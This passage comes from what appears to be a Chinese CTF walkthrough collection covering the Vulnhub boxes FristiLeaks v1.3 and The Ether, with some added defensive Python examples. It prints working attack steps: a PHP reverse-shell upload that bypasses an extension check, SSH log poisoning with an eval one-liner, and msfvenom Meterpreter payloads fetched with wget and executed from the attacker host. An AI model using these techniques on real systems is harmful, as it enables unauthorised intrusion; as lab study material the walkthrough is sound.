and the shell connects back</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>View passwd</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_20.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_21.jpg' alt='' referrerPolicy='no-referrer' /></p><h1><a name='header-n8599' class='md-header-anchor '></a>Section 7: FristiLeaks v1.3</h1><h2><a name='header-n8600' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n8601' class='md-header-anchor '></a>Download links</h3><p><a href='https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent' target='_blank' class='url'>https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent</a> 
<a href='https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova' target='_blank' class='url'>https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova</a></p><h3><a name='header-n8605' class='md-header-anchor '></a>Runtime environment</h3><ul><li>VirtualBox (either one will do)</li><li>VMware Workstation Player</li></ul><h3><a name='header-n8613' class='md-header-anchor '></a>Setup</h3><p>According to the instructions on the official site, the VMware virtual machine's MAC address must first be set to 08:00:27:A5:A6:76 
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>而後開啓VM</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_2.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8621' class='md-header-anchor '></a>主機發現</h3><p><code>Netdiscover –r 10.10.10.0/24</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_3.jpg' alt='' referrerPolicy='no-referrer' /><br/></p><p>能夠發現目標主機在10.10.10.132的位置</p><h3><a name='header-n8628' class='md-header-anchor '></a>服務發現</h3><p><code>nmap -sS -Pn -T4 -p- 10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>能夠看到打開了80端口,service爲HTTP</p><h3><a name='header-n8635' class='md-header-anchor '></a>詳細掃描80端口</h3><p>僅發現開放了80端口,對80端口進行詳細探測:</p><p><code>nmap -A -O -p80 10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>獲得如下有價值的信息:</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div 
class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">http-robots.txt: 3 disallowed entries</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>瀏覽一下web站點</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據nmap掃描的結果存在<code>robots.txt</code>文件,查看一下:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>訪問如下<code>robots.txt</code>提到的三個路徑</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>三個目錄內容相同,只有以上畫面。</p><p>接着,枚舉一下目錄:</p><p><code>dirb http://10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>在<code>images</code>目錄發現幾張照片:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看圖片,<code>keep-calm</code>彷佛是一個提示</p><p>KEEP CALM AND DRINK FRISTI</p><p>嘗試訪問 <a href='http://10.10.10.132/fristi' target='_blank' class='url'>http://10.10.10.132/fristi</a>/</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_11.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現一個登錄口。登陸界面存在一個嚴重安全問題,兩個輸入框都有自動完成的功能。(包括密碼)
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>掃描一下該目錄:</p><p><code>dirb http://10.10.10.132/fristi/</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現了<code>upload</code>目錄的index頁面</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_14.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看源代碼發現線索:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>註釋當中的信息代表,此頁面是一個叫eezeepz的人留下來的。</p><p>推測,<code>eezeepz</code>或許是帳號或者密碼</p><p>繼續向下,發現一大塊用base64編碼的字符串</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>複製,寫入一個文件,以後使用命令解碼:</p><p><code>base64 -d /tmp/encoded.txt</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據文件格式,這是一個PNG格式的圖畫,保存爲PNG格式</p><p><code>base64 -d /tmp/encoded.txt > decoded.png</code></p><p>查看發現一串字符串</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>嘗試使用以上獲取的信息進行登陸:</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div 
class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">username:eezeepz</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">password:keKkeKKeKKeKkEkkEk</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>登錄成功,發現文件上傳。此上傳點未作任何過濾,能夠直接上傳shell文件。</p><p>反彈Shell的腳本木馬能夠在這裏下載:<a href='http://pentestmonkey.net/tools/web-shells/php-reverse-shell' target='_blank' class='url'>http://pentestmonkey.net/tools/web-shells/php-reverse-shell</a></p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: 
relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">cp</span> /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">vi</span> reverse-shell.php</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>修改反彈shell的ip地址和監聽端口。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用<code>nc</code>監聽端口:</p><p><code>nc -nlvp 8888</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_21.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>根據回顯,只有png, jpg, gif 能上傳</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_22.jpg' alt='' referrerPolicy='no-referrer' /></p><p>修改一下文件名,後綴加上<code>.jpg</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_23.jpg' alt='' referrerPolicy='no-referrer' />
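</p><p>The rename works because the upload handler only looks at the last suffix of the file name. The Python below is an added example, not code from the FristiLeaks VM or from this walkthrough: <code>naive_is_allowed</code> is an assumed reconstruction of that weak check, and <code>strict_validate</code> is the validation a defender would write instead (exactly one extension, taken from an allowlist, with file content whose magic bytes match it). The function names, the allowlist and the sample inputs are all constructed for the example.</p>

```python
"""Upload validation: the weak suffix check beside a stricter one.

Added example (not the FristiLeaks VM's code or the walkthrough author's).
naive_is_allowed() is an assumed model of the check the target appears to
do; strict_validate() is the replacement a defender would write.
"""
import os
import re

ALLOWED_EXT = {"png", "jpg", "gif"}   # matches the upload form's stated rule

# File signatures (magic bytes) for the allowed image formats.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def naive_is_allowed(filename: str) -> bool:
    """Assumed weak check: only the text after the last dot is inspected,
    so 'reverse-shell.php.jpg' passes as a jpg."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXT


def strict_validate(filename: str, data: bytes) -> tuple:
    """Stricter check. Returns (accepted, reason); the reason is for server
    logs, not for the user."""
    base = os.path.basename(filename)          # drop any directory components
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        # 'a.php.jpg' has two extensions; 'a' and '.jpg' have none/no stem
        return False, "exactly one extension required"
    stem, ext = parts[0], parts[1].lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    if not re.fullmatch(r"[A-Za-z0-9_-]+", stem):
        return False, "unexpected characters in file name"
    if not data.startswith(MAGIC[ext]):
        # Claimed type and actual content disagree: reject regardless of name
        return False, f"content does not look like {ext}"
    return True, "ok"


def stored_name(ext: str, token: str) -> str:
    """Store under a server-generated name, never the client's."""
    return f"{token}.{ext.lower()}"
```

<p>Call <code>strict_validate(name, data)</code> on the raw upload before anything is written to disk. Even with this check, keep uploads under a server-generated name in a directory where the web server does not execute scripts, so that a false accept cannot turn into code execution.</p><p>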
​   <br/>
Upload succeeds; open the uploaded shell:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>We now have a low-privilege shell.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_25.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8754' class='md-header-anchor '></a>Privilege escalation</h3><p>Browse the file system; in the <code>home</code> directory:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_27.jpg' alt='' referrerPolicy='no-referrer' /></p><p>we see the home directory of the key person, eezeepz.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_28.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>notes.txt</code> gives a hint:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Following the hint, create a <code>runtis</code> file under /tmp.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_30.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8772' class='md-header-anchor '></a>Granting permissions</h3><p>According to <code>notes.txt</code>, the commands written into <code>/tmp/runtis</code> are executed on a schedule, so use them to change the permissions of the <code>/home/admin</code> directory.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_31.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Once the system has run the command, the contents of <code>/home/admin</code> can be read.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>There are several files; look at them in turn.</p><p>cryptpass.py</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_33.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Cryptepass.txt</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_34.jpg' alt='' referrerPolicy='no-referrer' /></p><p>whoisyourgodnow.txt</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_35.jpg' alt='' referrerPolicy='no-referrer' /></p><p>It looks as if the py file was used to encrypt them. Rewrite the file:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_36.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Try decrypting:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_37.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_38.jpg' alt='' referrerPolicy='no-referrer' /></p><p>This gives, respectively:</p><pre class="md-fences md-end-block" lang="">1.mVGZ3O3omkJLmy2pcuTq  :thisisalsopw123
2.=RFn0AKnlMHMPIzpyuTI0ITG :LetThereBeFristi!</pre><p>These are probably the password of user fristigod; try the combinations.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_39.jpg' alt='' referrerPolicy='no-referrer' />
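</p><p>The two pairs above are enough to see what <code>cryptpass.py</code> does. The Python below is an added example, not the VM's script or the author's code; it assumes the transform is base64, then string reversal, then ROT13, which is the one scheme that reproduces both listed pairs (the <code>encrypt</code> reconstruction is included so the assumption can be checked). Since every step is a keyless encoding, the "encryption" is only obfuscation, and anyone who can read the file can recover the passwords.</p>

```python
"""Inverting a home-made, keyless "encryption" (cryptpass.py).

Added example; not the FristiLeaks VM's script or the walkthrough author's
code. Assumption: the forward transform is base64 -> reverse -> ROT13,
which reproduces both ciphertext/plaintext pairs the walkthrough lists.
"""
import base64
import codecs


def encrypt(plaintext: str) -> str:
    """Reconstruction (assumed) of the forward transform.

    base64 makes the text printable, reversal and ROT13 only shuffle it;
    no step uses a secret, so this is an encoding, not encryption.
    """
    b64 = base64.b64encode(plaintext.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decrypt(ciphertext: str) -> str:
    """Undo the steps in reverse order: ROT13 (self-inverse), reverse,
    base64-decode. Raises on input that is not the product of encrypt()."""
    unrot = codecs.decode(ciphertext, "rot13")
    return base64.b64decode(unrot[::-1]).decode()


def recover_all(lines) -> dict:
    """Map every ciphertext in a list (one per line, as in the VM's text
    files) to its plaintext; malformed lines are reported, not skipped."""
    result = {}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            result[line] = decrypt(line)
        except Exception as exc:  # binascii.Error or UnicodeDecodeError
            result[line] = f"<undecodable: {exc.__class__.__name__}>"
    return result
```

<p>The point for a defender is that none of the steps involves a secret. Stored passwords should be salted password hashes (bcrypt, scrypt or Argon2), which cannot be run backwards at all, rather than a reversible transform dressed up as encryption.</p><p>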
​   <br/>
Looking up the error message: it comes down to how <code>su</code> is implemented. On environment B, <code>su</code> checks whether standard input is a tty; on environment A, <code>su</code> allows the password to be read from other files.</p><p>The workaround is as follows:</p><p><code>python -c 'import pty;pty.spawn("/bin/sh")'</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_40.jpg' alt='' referrerPolicy='no-referrer' /></p><p>After that it works normally.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_41.jpg' alt='' referrerPolicy='no-referrer' /></p><p>List the directory:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_43.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Look at the <code>.secret_admin_stuff</code> directory:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_45.jpg' alt='' referrerPolicy='no-referrer' /></p><p>This is a root-owned file, so our permissions should be insufficient.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_46.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Check the command history; output of <code>history</code>:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_47.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The <code>fristigod</code> user has been running commands through sudo.</p><p>Try the two passwords obtained earlier:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_50.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Login succeeds:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_51.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Use <code>sudo</code> to escalate and spawn a shell:</p><p><code>sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_52.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Read the files under /root directly.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_53.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Read the flag file to get the flag.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_54.jpg' alt='' referrerPolicy='no-referrer' /></p><h1><a name='header-n8868' class='md-header-anchor '></a>Section 8: The Ether</h1><h2><a name='header-n8869' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n8870' class='md-header-anchor '></a>Download link</h3><p><a href='http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip' target='_blank' class='url'>http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip</a></p><h3><a name='header-n8873' class='md-header-anchor '></a>Environment</h3><ul><li>This target ships as a VMware image: download it from Vulnhub, unpack it and run the <code>vmx</code> file.</li><li>Target: by default it obtains an address automatically. Once booted it is bridged to the physical NIC and joins the network.</li><li>Attacker: a Kali VM running in VirtualBox, also in bridged mode, which can then reach the target.</li></ul><h3><a name='header-n8884' class='md-header-anchor '></a>Target description</h3><p>This target is moderately difficult and not suited to beginners.</p><p>The goal is to break into the machine and find the flag hidden on the system.</p><p>The official hint: there is a file on the machine that plays an important role during the attack, but do not waste time trying to deobfuscate it.</p><h2><a name='header-n8891' class='md-header-anchor '></a>Information gathering</h2><ul><li>IP discovery</li></ul><p>First look at Kali's network configuration.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277606485214.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Then use fping to find the target. <code>fping -asg 192.168.1.0/24</code> finds four live IPs on the subnet.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277612581371.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Port scanning and service identification</li></ul><p>Use nmap's fast scan option (<code>-F</code>) on the <code>192.168.1.0/24</code> subnet.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277613128019.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The MAC addresses make the hosts easy to tell apart: <code>192.168.1.1</code> is a TP-Link router, <code>192.168.1.100</code> is an Apple device and <code>192.168.1.101</code> is a VMware virtual machine, so <code>192.168.1.101</code> is the target's IP.</p><p>With the target IP known, probe it in more detail with Nmap:</p><p><code>nmap -A -v 192.168.1.101 -oN nmap.txt</code></p><p>The parameters:</p><ul><li><code>-A</code> aggressive scan of the target: load all scripts and gather as much information as possible;</li><li><code>-v</code> show the scan progress in detail;</li><li><code>-oN</code> write the results as plain text to <code>nmap.txt</code>.</li></ul><p>Result:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277637460813.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Threat modelling</li></ul><p>The nmap results show only ports <code>22</code> and <code>80</code> open and the OS is <code>Ubuntu</code>. Port <code>22</code> is <code>SSH</code>, port <code>80</code> is <code>http</code>, served by <code>Apache/2.4.18</code>.</p><p>Web applications usually have all sorts of problems, so after this first look the web service is chosen as the initial entry point.</p><h2><a name='header-n8939' class='md-header-anchor '></a>Web vulnerability hunting</h2><h3><a name='header-n8940' class='md-header-anchor '></a>1. Scanning with nikto</h3><p>Scan for web vulnerabilities with nikto: <code>nikto -h 192.168.1.101</code>, where <code>-h</code> specifies the target.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277621096032.jpg' alt='' referrerPolicy='no-referrer' /></p><p>No obvious high-risk findings; it reports an <code>images</code> directory and the <code>/icons/README</code> file, neither of much use.</p><h3><a name='header-n8946' class='md-header-anchor '></a>2. Directory scanning with dirb</h3><p><code>dirb http://192.168.1.101</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277623420335.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Apart from some static files, nothing worth exploiting.</p><h3><a name='header-n8953' class='md-header-anchor '></a>3. Browsing the site's functions</h3><p>The first two steps found no vulnerabilities, so visit the site by hand and analyse its functions.</p><p>Clicking the <code>ABOUT US</code> link gives the URL <code>http://192.168.1.101/?file=about.php</code>, which suggests an arbitrary file inclusion.</p><h3><a name='header-n8958' class='md-header-anchor '></a>4. Testing the file inclusion</h3><p>To see the results clearly, Burp Suite is used to handle the HTTP requests.</p><p>Trying to include Linux system configuration files shows that there are some restrictions.</p><p>For example, including <code>/etc/passwd</code> returns nothing.
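</p><p>The restrictions can be understood from the filter that the chapter's review section later shows in index.php, which strips certain substrings from the <code>file</code> parameter before including it. The Python below is an added example rather than code from the target or the author: <code>blacklist_filter</code> is an assumed simulation of that <code>str_ireplace</code>-style stripping (the word list mirrors the one in the review section), and <code>resolve_page</code> shows the allowlist lookup that should replace it. The web root, the page table and the sample paths are constructed for the example.</p>

```python
"""Substring blacklist versus allowlist for a PHP-style include parameter.

Added example, not code from The Ether target or the walkthrough author.
blacklist_filter() is an assumed simulation of the str_ireplace() stripping
that the chapter's review section shows in index.php; resolve_page() is the
allowlist alternative. WEBROOT, PAGES and every sample path are constructed.
"""
import os

# Substrings the assumed blacklist removes (case-insensitively), in order.
STRIPPED = ["etc", "php:", "expect:", "data:", "proc", "home", "opt"]


def _remove_ci(text: str, needle: str) -> str:
    """One left-to-right pass removing every case-insensitive occurrence of
    needle, like a single str_ireplace() call: nothing is re-scanned."""
    lower, needle, out, i = text.lower(), needle.lower(), [], 0
    while i < len(text):
        if lower.startswith(needle, i):
            i += len(needle)          # skip the match
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


def blacklist_filter(path: str) -> str:
    """What include() actually receives after the stripping."""
    for word in STRIPPED:
        path = _remove_ci(path, word)
    return path


WEBROOT = "/var/www/html"                              # assumed document root
PAGES = {"index": "index.php", "about": "about.php"}   # assumed page table


def resolve_page(page: str):
    """Allowlist lookup: the client picks a page *name*; the server owns the
    path. Returns the absolute file path, or None if the name is unknown."""
    filename = PAGES.get(page)
    if filename is None:
        return None
    full = os.path.normpath(os.path.join(WEBROOT, filename))
    # Defence in depth: the resolved file must still sit inside the web root.
    if os.path.commonpath([WEBROOT, full]) != WEBROOT:
        return None
    return full
```

<p>The simulation explains why the earlier requests came back empty: <code>/etc/passwd</code> becomes <code>//passwd</code> and <code>php://filter/...</code> loses its scheme, while a log path that contains none of the listed words passes through untouched. A blacklist can only describe what its author thought of; the allowlist version never hands user input to <code>include</code> as a path at all.</p><p>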
</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277629489901.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Next, several common Apache log paths were tested:</p><pre class="md-fences md-end-block" lang="">/var/log/apache/access.log
/var/log/apache2/access.log
/var/www/logs/access.log
/var/log/access.log</pre><p>None returned anything.</p><p>Perhaps the configuration changed the log path, so try reading the Apache2 configuration file, <code>/etc/apache2/apache2.conf</code>; that fails as well.</p><p>Reading PHP source through the php:// wrapper also fails.</p><p><code>file=php://filter/convert.base64-encode/resource=index.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277632154094.jpg' alt='' referrerPolicy='no-referrer' /></p><p>From my earlier notes on exploiting file inclusion:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277635091513.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Combined with the earlier reconnaissance, the target only runs <code>http</code> and <code>ssh</code>. Since including the Apache log failed, try including the SSH login log.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277638432449.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The SSH login log is read successfully.</p><h2><a name='header-n8989' class='md-header-anchor '></a>Getting a shell</h2><h3><a name='header-n8990' class='md-header-anchor '></a>1. Getting a one-line webshell</h3><p>Log in to the target's SSH using a one-line PHP shell as the user name.</p><p><code>ssh '&lt;?php eval($_GET['f']); ?&gt;'@192.168.1.101</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277640398321.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The SSH log records this login attempt, which writes the one-liner into the SSH log file. Test whether it worked:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277643786689.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The one-liner has been written successfully.</p><h3><a name='header-n9003' class='md-header-anchor '></a>2. Generating a Meterpreter shell with msfvenom</h3><p>I use Msf a lot, so Msf is the main tool from here on.</p><p>First generate a shell binary for Linux.</p><p><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f elf &gt; shell.elf</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277683325190.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9012' class='md-header-anchor '></a>3. Setting up the Metasploit listener</h3><pre class="md-fences md-end-block" lang="">use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.1.102
exploit</pre><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277699437724.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9016' class='md-header-anchor '></a>4. Planting the Meterpreter shell</h3><p>First start a simple web server with Python: <code>python -m SimpleHTTPServer 80</code></p><p>Then use the one-liner obtained earlier to run commands that download and execute the generated payload.</p><p>Send the following requests in turn:</p><ol start='' ><li><code>/?file=/var/log/auth.log&amp;f=system('wget+192.168.1.102/shell.elf')%3b</code></li><li><code>/?file=/var/log/auth.log&amp;f=system('chmod+%2bx+shell.elf')%3b</code></li><li><code>/?file=/var/log/auth.log&amp;f=system('./shell.elf')%3b</code></li></ol><p>Notes:</p><ol start='' ><li>Because the commands contain spaces, plus signs and similar characters, the payload must be URL-encoded before it executes correctly.</li><li>The generated payload has no execute permission and cannot run after download, so <code>shell.elf</code> must first be made executable and then run.</li></ol><p>Result:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277699964066.jpg' alt='' referrerPolicy='no-referrer' 